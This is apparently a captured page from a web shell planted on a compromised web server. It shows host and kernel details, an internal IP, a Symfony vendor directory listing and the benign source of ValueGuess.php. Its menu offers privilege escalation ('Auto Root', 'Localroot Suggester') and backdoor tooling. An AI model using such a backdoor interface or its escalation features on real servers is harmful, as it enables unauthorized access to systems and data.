Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
form /
Guess /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
Guess.php
2.84
KB
-rwxrwxr-x
2026-03-13 14:59
TypeGuess.php
1.32
KB
-rwxrwxr-x
2026-03-13 14:59
ValueGuess.php
856
B
-rwxrwxr-x
2026-03-13 14:59
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Form\Guess; /** * Contains a guessed value. * * @author Bernhard Schussek <bschussek@gmail.com> */ class ValueGuess extends Guess { private string|int|bool|null $value; /** * @param int $confidence The confidence that the guessed class name is correct */ public function __construct(string|int|bool|null $value, int $confidence) { parent::__construct($confidence); $this->value = $value; } /** * Returns the guessed value. */ public function getValue(): string|int|bool|null { return $this->value; } }